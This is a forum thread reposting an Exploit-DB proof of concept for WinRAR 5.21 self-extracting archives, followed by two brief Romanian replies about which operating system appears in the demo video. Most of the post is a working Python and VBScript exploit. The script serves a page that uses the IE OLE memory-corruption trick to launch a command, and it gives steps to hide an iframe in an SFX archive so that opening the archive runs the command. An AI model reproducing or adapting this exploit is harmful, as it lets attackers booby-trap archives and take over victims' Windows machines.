Nytro Posted October 1, 2015 Report Posted October 1, 2015 [h=1]WinRar 5.21 - SFX OLE Command Execution[/h]#!/usr/bin/python -w# Title : WinRar SFX OLE Command Execution# Date : 25/09/2015# Author : R-73eN# Tested on : Windows Xp SP3 with WinRAR 5.21## Triggering the Vulnerability# Run this python script# Right click a file and then click on add to archive.# check the 'Create SFX archive' box# go to Advanced tab# go to SFX options# go to Text And icon# copy the code that the script will generate to 'Text to display into sfx windows'# Click OK two times and the sfx archive is generated.# If someone opens that sfx archive a calculator should pop up.## Video : https://youtu.be/vIslLJYvnaM#banner = ""banner +=" ___ __ ____ _ _ \n"banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"print bannerimport socketCRLF = "\r\n"#OLE command executionexploit = """<html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><head></head><body><SCRIPT LANGUAGE="VBScript">function runmumaa() On Error Resume Nextset shell=createobject("Shell.Application")shell.ShellExecute "calc.exe", "runas", 0end function</script><SCRIPT LANGUAGE="VBScript">dim aa()dim ab()dim a0dim a1dim a2dim a3dim win9xdim intVersiondim rndadim funclassdim myarrayBegin()function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end ifend functionfunction BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5)end functionfunction Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then Create=True Exit For End If Nextend functionsub testaa()end subfunction mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=rum(i+8) i=rum(i+16) j=rum(i+&h134) for k=0 to &h60 step 4 j=rum(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=rum(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end functionfunction Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end functionfunction rum(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 rum=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0)end function</script></body></html>"""response = "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + "Connection: close" + CRLF + "Server: Apache" + CRLF + "Content-Length: " + str(len(exploit)) + CRLF + CRLF + exploit + CRLF sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)host = raw_input(" Enter Local IP: ")server_address = (host, 8080)sock.bind(server_address)print "[+] Server started " + host + " [+]"sock.listen(1)print "[+] Insert this code on the 'Text to display into sfx windows' [+]"print "\n<iframe src='http://" + host + ":8080/'> </iframe>"print "\n[+] Waiting for request . . . [+]"connection, client_address = sock.accept()while True: connection.recv(2048) print "[+] Got request , sending exploit . . .[+]" connection.send(exploit) print "[+] Exploit sent , A calc should pop up . . [+]" print "\nhttps://www.infogen.al/\n" exit(0)Sursa: https://www.exploit-db.com/exploits/38319/ Quote
QUADMACHINE Posted October 19, 2015 Report Posted October 19, 2015 @Nytro ce OS foloseste tipul din video? Exploitul functioneaza doar pe xp sau si alte sisteme de operare? Quote
pr00f Posted October 19, 2015 Report Posted October 19, 2015 @Nytro ce OS foloseste tipul din video? Exploitul functioneaza doar pe xp sau si alte sisteme de operare?ceva distro cu XFCE Quote